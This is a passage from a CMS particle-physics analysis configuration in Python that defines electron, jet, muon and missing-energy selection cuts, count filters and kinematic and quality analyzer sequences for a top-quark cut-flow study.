*\n## process.electronSelection = countLayer1Electrons.clone(src = 'electronCF3',\n## minNumber = 1,\n## maxNumber = 1\n## )\n\n## ## sequence with filter for optimal jets --> muon analysis\n## from PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\n## process.jetSelection1 = countLayer1Jets.clone(src = 'jetsCF2', \n## minNumber = 2\n## )\n\n## ## sequence with filter for optimal jets --> muon analysis\n## from PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\n## process.jetSelection2 = countLayer1Jets.clone(src = 'jetsCF3HighPur', \n## minNumber = 1\n## )\n\n\n## ---\n## efficiency calculation event counting cuts\n## ---\n\n## sequence with filter for optimal electrons \nfrom PhysicsTools.PatAlgos.selectionLayer1.electronCountFilter_cfi import *\nprocess.elecSelIdPtEta = countLayer1Electrons.clone(src = 'electronCF2',\n minNumber = 1,\n maxNumber = 1\n )\n## sequence with filter for optimal electrons \nfrom PhysicsTools.PatAlgos.selectionLayer1.electronCountFilter_cfi import *\nprocess.elecSelRelIso = countLayer1Electrons.clone(src = 'electronCF3',\n minNumber = 1,\n maxNumber = 1\n )\n\n\n\n## sequence with filter for optimal jets \nfrom PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\nprocess.jetSelPtEtaEmf = countLayer1Jets.clone(src = 'jetsCF2', \n minNumber = 2\n )\n## sequence with filter for optimal jets \nfrom PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\nprocess.jetSelBtag = countLayer1Jets.clone(src = 'jetsCF3HighPur', \n minNumber = 1\n )\n\n## \nprocess.selectedLayer1MET = cms.EDFilter(\"PATMETSelector\",\n src = cms.InputTag(\"layer1METs\"),\n cut = cms.string('et>=30.')\n)\n\nprocess.selectEventsWithMET = cms.EDFilter(\"PATCandViewCountFilter\",\n minNumber = cms.uint32(1),\n maxNumber = cms.uint32(999999),\n src = cms.InputTag(\"selectedLayer1MET\")\n)\n\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\nprocess.muonSelStAl = countLayer1Muons.clone(src = 'muonCF1StAl', \n minNumber = 1 \n )\n\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\nprocess.muonSelComb = countLayer1Muons.clone(src = 'muonCF1Comb', \n minNumber = 1 \n )\n\n\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\nprocess.muonSelTrkiso = countLayer1Muons.clone(src = 'combTrkiso', # !!!\n minNumber = 1 \n )\nprocess.muonSelReliso = countLayer1Muons.clone(src = 'combReliso', # !!!\n minNumber = 1 \n )\nprocess.muonSelCaliso = countLayer1Muons.clone(src = 'combCaliso', # !!!\n minNumber = 1 \n )\n\n\n\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\nprocess.muonSelEcalHcal = countLayer1Muons.clone(src = 'combEcalHcal', \n minNumber = 1 \n )\n## sequence with filter for optimal muon \nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\n##process.muonSelTrackMu = countLayer1Muons.clone(src = 'combValhitChi2Trksig', \n## minNumber = 1 \n## )\n\nprocess.muonSelValhit = countLayer1Muons.clone(src = 'combValhit', \n minNumber = 1 \n )\n\nprocess.muonSelChi2 = countLayer1Muons.clone(src = 'combChi2', \n minNumber = 1 \n )\n\nprocess.muonSelTrksig = countLayer1Muons.clone(src = 'combTrksig', \n minNumber = 1 \n )\n\n\n## ---\n## define selection\n## ---\n\n## electron selection\nprocess.load(\"TopAnalysis.TopFilter.sequences.electronSelection_cff\")\n\nfrom TopAnalysis.TopFilter.sequences.electronSelection_cff import centralElectrons\nprocess.centralElectrons = centralElectrons\n\nfrom TopAnalysis.TopFilter.sequences.electronSelection_cff import highPtElectrons\nprocess.highPtElectrons = highPtElectrons\n\nfrom TopAnalysis.TopFilter.sequences.electronSelection_cff import tightElectrons\nprocess.tightElectrons = tightElectrons\n\n\n\n## jet selection\nprocess.load(\"TopAnalysis.TopFilter.sequences.jetSelection_cff\")\n\nfrom TopAnalysis.TopFilter.sequences.jetSelection_cff import reliableJets\nprocess.reliableJets = reliableJets\n\nfrom TopAnalysis.TopFilter.sequences.jetSelection_cff import centralJets\nprocess.centralJets = centralJets\n\nfrom TopAnalysis.TopFilter.sequences.jetSelection_cff import goodJets\nprocess.goodJets = goodJets\n\n\n\n## muon selection\nprocess.load(\"TopAnalysis.TopFilter.sequences.muonSelection_cff\")\n\nfrom TopAnalysis.TopFilter.sequences.muonSelection_cff import standAloneMuons\nprocess.standAloneMuons = standAloneMuons\n\n\n## ---\n## define monitoring\n## ---\n\n\n## ---\n## electron kinematics analyzer\n## ---\nprocess.load(\"TopAnalysis.TopFilter.sequences.electronSelection_cff\")\nprocess.load(\"TopAnalysis.TopAnalyzer.ElectronKinematics_cfi\")\n\n\n\n## CUT FLOW electrons\nfrom PhysicsTools.PatAlgos.selectionLayer1.electronSelector_cfi import *\n\nprocess.electronCF2 = selectedLayer1Electrons.clone(src = 'selectedLayer1Electrons', \n cut = 'electronID(\\\"eidRobustTight\\\") > 0.99 &'\n 'abs(eta) < 1.5 & et > 20.'\n )\nprocess.electronCF3 = selectedLayer1Electrons.clone(src = 'electronCF2', \n cut = '(trackIso+caloIso)/et < 0.1'\n )\n\n## 1. leading electron before any cut (selLay1): cut flow analysis CF0\nprocess.eleKin_1st_CF0_selLay1 = process.analyzeElectronKinematics.clone(src = 'selectedLayer1Electrons',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. leading electron with 1.cut (electronId: robust tight): cut flow analysis CF1\nprocess.eleKin_1st_CF1_roTigh = process.analyzeElectronKinematics.clone(src = 'idOnlyElectrons',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. leading electron with 2.cut (robust tight & abs(eta)<1.5 & et>20 ): cut flow analysis CF2 recap electron before isolation\nprocess.eleKin_1st_CF2_ptEta = process.analyzeElectronKinematics.clone(src = 'electronCF2',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. leading electron after with 3. cut (rob. tight & abs(eta)<1.5 & et>20 & relIso<0.1 ): CF3 recap electron after isolation\nprocess.eleKin_1st_CF3_relIso = process.analyzeElectronKinematics.clone(src = 'electronCF3',\n analyze = cms.PSet(index = cms.int32(0))\n )\n\n## define sequence\nprocess.monitorElectronKinematics = cms.Sequence(process.eleKin_1st_CF0_selLay1 +\n process.eleKin_1st_CF1_roTigh +\n process.eleKin_1st_CF2_ptEta +\n process.eleKin_1st_CF3_relIso \n )\n\n### clones for after all cuts (aac)\n\n## 1. leading electron before any cut (selLay1): cut flow analysis CF0\nprocess.eleKin_1st_CF0_selLay1_aac = process.eleKin_1st_CF0_selLay1.clone()\n\n\n## 1. leading electron with 1.cut (electronId: robust tight): cut flow analysis CF1\nprocess.eleKin_1st_CF1_roTigh_aac = process.eleKin_1st_CF1_roTigh.clone()\n\n\n## 1. leading electron with 2.cut (robust tight & abs(eta)<1.5 & et>20 ): cut flow analysis CF2 recap electron before isolation\nprocess.eleKin_1st_CF2_ptEta_aac = process.eleKin_1st_CF2_ptEta.clone()\n\n\n## 1. leading electron after with 3. cut (rob. tight & abs(eta)<1.5 & et>20 & relIso<0.1 ): CF3 recap electron after isolation\nprocess.eleKin_1st_CF3_relIso_aac = process.eleKin_1st_CF3_relIso.clone()\n\n\n\n## define sequence: clones for after all cuts (aac\nprocess.monitorElectronKinematics_aac = cms.Sequence(process.eleKin_1st_CF0_selLay1_aac +\n process.eleKin_1st_CF1_roTigh_aac +\n process.eleKin_1st_CF2_ptEta_aac +\n process.eleKin_1st_CF3_relIso_aac \n )\n\n\n## ---\n## electron quality analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.ElectronQuality_cfi\")\n\n\n## 1. lead. electron with no restriction (selectedLayer1) CF0\nprocess.eleID_1st_CF0 = process.analyzeElectronQuality.clone (src = 'selectedLayer1Electrons',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. lead. electron after restriction in electronID CF1\nprocess.eleID_1st_CF1 = process.analyzeElectronQuality.clone (src = 'idOnlyElectrons',\n analyze = cms.PSet(index = cms.int32(0))\n )\n\n## 1. lead. electron after with restriction in electronID & eta and pt \nprocess.eleID_1st_CF2 = process.analyzeElectronQuality.clone (src = 'electronCF2',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## 1. lead. electron with restriction in electronID & eta and pt & rel.isolation\nprocess.eleID_1st_CF3 = process.analyzeElectronQuality.clone (src = 'electronCF3',\n analyze = cms.PSet(index = cms.int32(0))\n )\n## define sequence\nprocess.monitorElectronQuality = cms.Sequence(process.eleID_1st_CF0 +\n process.eleID_1st_CF1 +\n process.eleID_1st_CF2 +\n process.eleID_1st_CF3 \n )\n\n\n## ---\n## electron quality analyzer aac\n## ---\n\n## 1. lead. electron with no restriction (selectedLayer1) CF0\nprocess.eleID_1st_CF0_aac = process.eleID_1st_CF0.clone()\n\n\n## 1. lead. electron after restriction in electronID CF1\nprocess.eleID_1st_CF1_aac = process.eleID_1st_CF1.clone()\n\n\n## 1. lead. electron after with restriction in electronID & eta and pt \nprocess.eleID_1st_CF2_aac = process.eleID_1st_CF2.clone()\n\n\n## 1. lead. electron with restriction in electronID & eta and pt & rel.isolation\nprocess.eleID_1st_CF3_aac = process.eleID_1st_CF3.clone()\n\n\n## define sequence\nprocess.monitorElectronQuality_aac = cms.Sequence(process.eleID_1st_CF0_aac +\n process.eleID_1st_CF1_aac +\n process.eleID_1st_CF2_aac +\n process.eleID_1st_CF3_aac \n )\n\n\n\n\n\n\n## CUT FLOW jets\nfrom PhysicsTools.PatAlgos.selectionLayer1.jetSelector_cfi import *\n\nprocess.jetsCF1 = selectedLayer1Jets.clone(src = 'selectedLayer1Jets', \n cut = 'abs(eta)<3 & pt>20'\n )\n\nprocess.jetsCF2 = selectedLayer1Jets.clone(src = 'jetsCF1', \n cut = '0.05 < emEnergyFraction &'\n '0.95 > emEnergyFraction'\n )\n\nprocess.jetsCF3HighPur = selectedLayer1Jets.clone(src = 'jetsCF2', \n cut = 'bDiscriminator(\\\"trackCountingHighPurBJetTags\\\") > 3.0'\n )\n\nprocess.jetsCF3HighEff = selectedLayer1Jets.clone(src = 'jetsCF2', \n cut = 'bDiscriminator(\\\"trackCountingHighEffBJetTags\\\") > 3.0'\n )\n\n\n\nprocess.bJetsCF2 = selectedLayer1Jets.clone(src = 'selectedLayer1Jets', \n cut = 'abs(partonFlavour)==5 &'\n 'abs(eta)<3 & pt>20 &'\n '0.05 < emEnergyFraction &'\n '0.95 > emEnergyFraction'\n )\n\nprocess.lightQJetsCF2 = selectedLayer1Jets.clone(src = 'selectedLayer1Jets', \n cut = 'abs(partonFlavour)!=5 & abs(partonFlavour)!=4 &'\n 'abs(eta)<3 & pt>20 &'\n '0.05 < emEnergyFraction &'\n '0.95 > emEnergyFraction'\n )\n\n## ---\n## jet kinematics analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.JetKinematics_cfi\")\n\n\n## 1. leading jet before any cut\nprocess.jetKin_1st_CF0_selLay1 = process.analyzeJetKinematics.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(0), correctionLevel = cms.string('abs' ) )\n )\n## 2. leading jet before any cut\nprocess.jetKin_2nd_CF0_selLay1 = process.analyzeJetKinematics.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(1), correctionLevel = cms.string('abs' ) )\n )\n## all jets before any cut\nprocess.jetKin_all_CF0_selLay1 = process.analyzeJetKinematics.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(-1), correctionLevel = cms.string('abs' ) )\n )\n\n\n## 1. leading jet after restriction in pt & eta\nprocess.jetKin_1st_CF1_ptEta = process.analyzeJetKinematics.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(0), correctionLevel = cms.string('abs' ) )\n )\n## 2. leading jet after restriction in pt & eta\nprocess.jetKin_2nd_CF1_ptEta = process.analyzeJetKinematics.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(1), correctionLevel = cms.string('abs' ) )\n )\n## all jets after restriction in pt & eta\nprocess.jetKin_all_CF1_ptEta = process.analyzeJetKinematics.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(-1), correctionLevel = cms.string('abs' ) )\n )\n\n\n\n## 1. leading jet after restriction in pt & eta & emf leading jet mult before b-discr.\nprocess.jetKin_1st_CF2_emf = process.analyzeJetKinematics.clone (src = 'jetsCF2', \n analyze = cms.PSet(index = cms.int32(0), correctionLevel = cms.string('abs' ) )\n )\n## 2. leading jet after restriction in pt & eta & emf 2nd jet mult before b-discr.\nprocess.jetKin_2nd_CF2_emf = process.analyzeJetKinematics.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(1), correctionLevel = cms.string('abs' ) )\n )\n## all jets after restriction in pt & eta & emf 2nd jet mult before b-discr.\nprocess.jetKin_all_CF2_emf = process.analyzeJetKinematics.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(-1), correctionLevel = cms.string('abs' ) )\n )\n\n\n\n\n## 1. leading jet after restriction in pt & eta & emf & b-discriminator leading jet mult after b-discr.\nprocess.jetKin_1st_CF3_highPur = process.analyzeJetKinematics.clone (src = 'jetsCF3HighPur',\n analyze = cms.PSet(index = cms.int32(0), correctionLevel = cms.string('abs' ) )\n )\n## 2. leading jet after restriction in pt & eta & emf & b-discriminator 2nd jet mult after b-discr.\nprocess.jetKin_2nd_CF3_highPur = process.analyzeJetKinematics.clone (src = 'jetsCF3HighPur',\n analyze = cms.PSet(index = cms.int32(1), correctionLevel = cms.string('abs' ) )\n )\n## all jets after restriction in pt & eta & emf & b-discriminator 2nd jet mult after b-discr.\nprocess.jetKin_all_CF3_highPur = process.analyzeJetKinematics.clone (src = 'jetsCF3HighPur',\n analyze = cms.PSet(index = cms.int32(-1), correctionLevel = cms.string('abs' ) )\n )\n\n\n\n## define sequence\nprocess.monitorJetKinematics = cms.Sequence(process.jetKin_1st_CF0_selLay1 +\n process.jetKin_2nd_CF0_selLay1 +\n process.jetKin_all_CF0_selLay1 +\n \n process.jetKin_1st_CF1_ptEta +\n process.jetKin_2nd_CF1_ptEta +\n process.jetKin_all_CF1_ptEta +\n \n process.jetKin_1st_CF2_emf +\n process.jetKin_2nd_CF2_emf +\n process.jetKin_all_CF2_emf +\n \n process.jetKin_1st_CF3_highPur +\n process.jetKin_2nd_CF3_highPur +\n process.jetKin_all_CF3_highPur\n )\n\n\n\n## ---\n## jet kinematics analyzer aac\n## ---\n\n\n## 1. leading jet before any cut aac\nprocess.jetKin_1st_CF0_selLay1_aac = process.jetKin_1st_CF0_selLay1.clone()\n\n## 2. leading jet before any cut aac\nprocess.jetKin_2nd_CF0_selLay1_aac = process.jetKin_2nd_CF0_selLay1.clone()\n\n## all jets before any cut aac\nprocess.jetKin_all_CF0_selLay1_aac = process.jetKin_all_CF0_selLay1.clone()\n\n\n## 1. leading jet after restriction in pt & eta aac\nprocess.jetKin_1st_CF1_ptEta_aac = process.jetKin_1st_CF1_ptEta.clone()\n\n## 2. leading jet after restriction in pt & eta aac\nprocess.jetKin_2nd_CF1_ptEta_aac = process.jetKin_2nd_CF1_ptEta.clone()\n\n## all jets after restriction in pt & eta aac\nprocess.jetKin_all_CF1_ptEta_aac = process.jetKin_all_CF1_ptEta.clone()\n\n\n\n## 1. leading jet after restriction in pt & eta & emf aac leading jet mult before b-discr.\nprocess.jetKin_1st_CF2_emf_aac = process.jetKin_1st_CF2_emf.clone()\n\n## 2. leading jet after restriction in pt & eta & emf aac 2nd jet mult before b-discr.\nprocess.jetKin_2nd_CF2_emf_aac = process.jetKin_2nd_CF2_emf.clone()\n\n## all jets after restriction in pt & eta & emf aac 2nd jet mult before b-discr.\nprocess.jetKin_all_CF2_emf_aac = process.jetKin_all_CF2_emf.clone()\n\n\n\n## 1. leading jet after restriction in pt & eta & emf & b-discriminator aac leading jet mult after b-discr.\nprocess.jetKin_1st_CF3_highPur_aac = process.jetKin_1st_CF3_highPur.clone()\n\n## 2. leading jet after restriction in pt & eta & emf & b-discriminator aac 2nd jet mult after b-discr.\nprocess.jetKin_2nd_CF3_highPur_aac = process.jetKin_2nd_CF3_highPur.clone()\n\n## all jets after restriction in pt & eta & emf & b-discriminator aac 2nd jet mult after b-discr.\nprocess.jetKin_all_CF3_highPur_aac = process.jetKin_all_CF3_highPur.clone()\n\n\n\n\n## define sequence\nprocess.monitorJetKinematics_aac = cms.Sequence(process.jetKin_1st_CF0_selLay1_aac +\n process.jetKin_2nd_CF0_selLay1_aac +\n process.jetKin_all_CF0_selLay1_aac +\n \n process.jetKin_1st_CF1_ptEta_aac +\n process.jetKin_2nd_CF1_ptEta_aac +\n process.jetKin_all_CF1_ptEta_aac +\n \n process.jetKin_1st_CF2_emf_aac +\n process.jetKin_2nd_CF2_emf_aac +\n process.jetKin_all_CF2_emf_aac +\n \n process.jetKin_1st_CF3_highPur_aac +\n process.jetKin_2nd_CF3_highPur_aac +\n process.jetKin_all_CF3_highPur_aac\n )\n\n\n## ---\n## jet quality analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.JetQuality_cfi\")\n\n## 1. leading jet w/o any restriction (selLay1) CF0\nprocess.jetID_1st_CF0 = process.analyzeJetQuality.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n\n## 2. leading jet w/o any restriction (selLay1) CF0\nprocess.jetID_2nd_CF0 = process.analyzeJetQuality.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n\n## all jet w/o any restriction (selLay1) CF0\nprocess.jetID_all_CF0 = process.analyzeJetQuality.clone (src = 'selectedLayer1Jets',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n## 1. leading jet after restriction in eta and pt CF1\nprocess.jetID_1st_CF1 = process.analyzeJetQuality.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n\n## 2. leading jet after restriction in eta and pt CF1\nprocess.jetID_2nd_CF1 = process.analyzeJetQuality.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n## all jets after restriction in eta and pt CF1\nprocess.jetID_all_CF1 = process.analyzeJetQuality.clone (src = 'jetsCF1',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n## 1. leading jet after restriction in eta, pt and emf CF2\nprocess.jetID_1st_CF2 = process.analyzeJetQuality.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n## 2. leading jet after restriction in eta, pt and emf CF2\nprocess.jetID_2nd_CF2 = process.analyzeJetQuality.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n## all jets after restriction in eta, pt and emf CF2\nprocess.jetID_all_CF2 = process.analyzeJetQuality.clone (src = 'jetsCF2',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n\n## 1. leading bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_1st_bQCF2 = process.analyzeJetQuality.clone (src = 'bJetsCF2',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n## 2. leading bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_2nd_bQCF2 = process.analyzeJetQuality.clone (src = 'bJetsCF2',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n## all bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_all_bQCF2 = process.analyzeJetQuality.clone (src = 'bJetsCF2',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n## 1. leading lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_1st_lightQCF2 = process.analyzeJetQuality.clone (src = 'lightQJetsCF2',\n analyze = cms.PSet(index = cms.int32(0), flavor = cms.string('uds' ) )\n )\n\n## 2. leading lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_2nd_lightQCF2 = process.analyzeJetQuality.clone (src = 'lightQJetsCF2',\n analyze = cms.PSet(index = cms.int32(1), flavor = cms.string('uds' ) )\n )\n## all lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_all_lightQCF2 = process.analyzeJetQuality.clone (src = 'lightQJetsCF2',\n analyze = cms.PSet(index = cms.int32(-1), flavor = cms.string('uds' ) )\n )\n\n\n\n## define sequence\nprocess.monitorJetQuality = cms.Sequence(process.jetID_1st_CF0 +\n process.jetID_2nd_CF0 +\n process.jetID_all_CF0 +\n \n process.jetID_1st_CF1 +\n process.jetID_2nd_CF1 +\n process.jetID_all_CF1 +\n \n process.jetID_1st_CF2 +\n process.jetID_2nd_CF2 +\n process.jetID_all_CF2 +\n \n process.jetID_1st_bQCF2 +\n process.jetID_2nd_bQCF2 +\n process.jetID_all_bQCF2 +\n \n process.jetID_1st_lightQCF2 +\n process.jetID_2nd_lightQCF2 +\n process.jetID_all_lightQCF2\n )\n\n## ---\n## jet quality analyzer aac\n## ---\n\n\n## 1. leading jet w/o any restriction (selLay1) CF0\nprocess.jetID_1st_CF0_aac = process.jetID_1st_CF0.clone()\n\n## 2. leading jet w/o any restriction (selLay1) CF0\nprocess.jetID_2nd_CF0_aac = process.jetID_2nd_CF0.clone()\n\n## all jets w/o any restriction (selLay1) CF0\nprocess.jetID_all_CF0_aac = process.jetID_all_CF0.clone()\n\n\n\n## 1. leading jet after restriction in eta and pt CF1\nprocess.jetID_1st_CF1_aac = process.jetID_1st_CF1.clone()\n\n## 2. leading jet after restriction in eta and pt CF1\nprocess.jetID_2nd_CF1_aac = process.jetID_2nd_CF1.clone()\n\n## all jets after restriction in eta and pt CF1\nprocess.jetID_all_CF1_aac = process.jetID_all_CF1.clone()\n\n\n\n## 1. leading jet after restriction in eta, pt and emf CF2\nprocess.jetID_1st_CF2_aac = process.jetID_1st_CF2.clone()\n\n## 2. leading jet after restriction in eta, pt and emf CF2\nprocess.jetID_2nd_CF2_aac = process.jetID_2nd_CF2.clone()\n\n## all jets after restriction in eta, pt and emf CF2\nprocess.jetID_all_CF2_aac = process.jetID_all_CF2.clone()\n\n\n\n## 1. leading bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_1st_bQCF2_aac = process.jetID_1st_bQCF2.clone()\n\n## 2. leading bQJet with restr. in eta, pt and emf bQCF2\nprocess.jetID_2nd_bQCF2_aac = process.jetID_2nd_bQCF2.clone()\n\n## all bQJets with restr. in eta, pt and emf bQCF2\nprocess.jetID_all_bQCF2_aac = process.jetID_all_bQCF2.clone()\n\n\n\n## 1. leading lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_1st_lightQCF2_aac = process.jetID_1st_lightQCF2.clone()\n\n## 2. leading lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_2nd_lightQCF2_aac = process.jetID_2nd_lightQCF2.clone()\n\n## all lightQJet with restr. in eta, pt and emf lightQCF2\nprocess.jetID_all_lightQCF2_aac = process.jetID_all_lightQCF2.clone()\n\n\n\n## define sequence\nprocess.monitorJetQuality_aac = cms.Sequence(process.jetID_1st_CF0_aac +\n process.jetID_2nd_CF0_aac +\n process.jetID_all_CF0_aac +\n \n process.jetID_1st_CF1_aac +\n process.jetID_2nd_CF1_aac +\n process.jetID_all_CF1_aac +\n \n process.jetID_1st_CF2_aac +\n process.jetID_2nd_CF2_aac +\n process.jetID_all_CF2_aac +\n \n process.jetID_1st_bQCF2_aac +\n process.jetID_2nd_bQCF2_aac +\n process.jetID_all_bQCF2_aac +\n \n process.jetID_1st_lightQCF2_aac +\n process.jetID_2nd_lightQCF2_aac +\n process.jetID_all_lightQCF2_aac \n )\n\n## loade METKinematicsAnalyzer\nprocess.load(\"TopAnalysis.TopAnalyzer.METKinematics_cfi\")\n\n\n## CUT FLOW muon\nfrom PhysicsTools.PatAlgos.selectionLayer1.muonSelector_cfi import *\n\n\nprocess.muonCF0 = selectedLayer1Muons.clone(src = 'selectedLayer1Muons', \n cut = '' \n )\n\nprocess.muonCF1StAl = selectedLayer1Muons.clone(src = 'muonCF0', \n cut = 'standAloneMuon.isNull = 0' \n )\n\nprocess.muonCF1Comb = selectedLayer1Muons.clone(src = 'muonCF0', \n cut = 'combinedMuon.isNull = 0' \n )\n\n\n\n## ---\n## muon kinematics analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.MuonKinematics_cfi\")\n\n## 1. leading muon with standAlone restriction\nprocess.muonKin_1st_CF0 = process.analyzeMuonKinematics.clone(src='muonCF0',\n analyze = cms.PSet(index = cms.int32(0))\n )\n\nprocess.muonKin_1st_CF1StAl = process.analyzeMuonKinematics.clone(src='muonCF1StAl',\n analyze = cms.PSet(index = cms.int32(0))\n )\n\nprocess.muonKin_1st_CF1Comb = process.analyzeMuonKinematics.clone(src='muonCF1Comb',\n\n analyze = cms.PSet(index = cms.int32(0))\n )\n\nprocess.muonKin = cms.Sequence(process.muonKin_1st_CF0 +\n process.muonKin_1st_CF1StAl +\n process.muonKin_1st_CF1Comb\n )\n\n\n\nprocess.muonKin_1st_CF0_aac = process.muonKin_1st_CF0.clone()\n\nprocess.muonKin_1st_CF1StAl_aac = process.muonKin_1st_CF1StAl.clone()\n\nprocess.muonKin_1st_CF1Comb_aac = process.muonKin_1st_CF1Comb.clone()\n\n\nprocess.muonKin_aac = cms.Sequence(process.muonKin_1st_CF0_aac +\n process.muonKin_1st_CF1StAl_aac +\n process.muonKin_1st_CF1Comb_aac\n )\n\n\n\n\n## ---\n## muon quality analyzer \n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.MuonQuality_cfi\")\n\nprocess.muonID_1st_CF0 = process.analyzeMuonQuality.clone (src = 'muonCF0',\n analyze = cms.PSet(index = cms.int32(0) )\n )\n\nprocess.muonID_1st_CF1Comb = process.analyzeMuonQuality.clone (src = 'muonCF1Comb',\n analyze = cms.PSet(index = cms.int32(0) )\n )\n\n\nprocess.muonID = cms.Sequence(process.muonID_1st_CF0 +\n ##process.muonID_1st_CF1StAl +\n process.muonID_1st_CF1Comb\n )\n\n\n## ---\n## muon quality analyzer aac\n## ---\n\nprocess.muonID_1st_CF0_aac = process.muonID_1st_CF0.clone()\n\nprocess.muonID_1st_CF1Comb_aac = process.muonID_1st_CF1Comb.clone()\n\n\nprocess.muonID_aac = cms.Sequence(process.muonID_1st_CF0_aac +\n ##process.muonID_1st_CF1StAl_aac +\n process.muonID_1st_CF1Comb_aac\n )\n\n\n\n## ---\n## probe efficiency analysis, to be applied after combined muon\n## ---\n\n\n\n## CUT FLOW muon for effiecincy analysis probe --> test\n\nprocess.comb = selectedLayer1Muons.clone(src = 'muonCF0', \n cut = 'combinedMuon.isNull = 0 &'\n '(trackIso+caloIso)/pt < 0.05'\n )\n\nprocess.combValhit = selectedLayer1Muons.clone(src = 'comb', \n cut = 'track.numberOfValidHits >= 11'\n )\n\nprocess.combChi2 = selectedLayer1Muons.clone(src = 'comb', \n cut = 'combinedMuon.normalizedChi2 < 10.0'\n )\n\nprocess.combTrksig = selectedLayer1Muons.clone(src = 'comb', \n cut = 'abs(dB) < 0.02'\n )\n\n\nprocess.combValhitChi2Trksig = selectedLayer1Muons.clone(src = 'comb', \n cut = 'track.numberOfValidHits >= 11 &'\n 'combinedMuon.normalizedChi2 < 10.0 &'\n 'abs(dB) < 0.02'\n )\n## trackMu = combValhitChi2Trksig\n\n\nprocess.trackMuEcal = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'ecalIsoDeposit.candEnergy < 4' \n )\n\nprocess.trackMuHcal = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'hcalIsoDeposit.candEnergy < 6' \n )\n\nprocess.trackMuEcalHcal = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'ecalIsoDeposit.candEnergy < 4 &'\n 'hcalIsoDeposit.candEnergy < 6' \n )\n\n\nprocess.trackMuTrkiso = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'trackIso < 1.' \n )\n\nprocess.trackMuCaliso = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = 'caloIso < 5.' \n )\n\nprocess.trackMuReliso = selectedLayer1Muons.clone(src = 'combValhitChi2Trksig', \n cut = '(trackIso+caloIso)/pt < 0.05' \n )\n\n\n\nprocess.combEcal = selectedLayer1Muons.clone(src = 'comb', \n cut = 'ecalIsoDeposit.candEnergy < 4' \n )\n\nprocess.combHcal = selectedLayer1Muons.clone(src = 'comb', \n cut = 'hcalIsoDeposit.candEnergy < 6' \n )\n\nprocess.combEcalHcal = selectedLayer1Muons.clone(src = 'comb', \n cut = 'ecalIsoDeposit.candEnergy < 4 &'\n 'hcalIsoDeposit.candEnergy < 6' \n )\n\nprocess.combEcalHcalTrkiso = selectedLayer1Muons.clone(src = 'combEcalHcal', \n cut = 'trackIso < 1.'\n )\n\nprocess.combEcalHcalCaliso = selectedLayer1Muons.clone(src = 'combEcalHcal', \n cut = 'caloIso < 5.'\n )\n\nprocess.combEcalHcalReliso = selectedLayer1Muons.clone(src = 'combEcalHcal', \n cut = '(trackIso+caloIso)/pt < 0.05'\n )\n \n\n\nprocess.combTrkiso = selectedLayer1Muons.clone(src = 'comb', \n cut = 'trackIso < 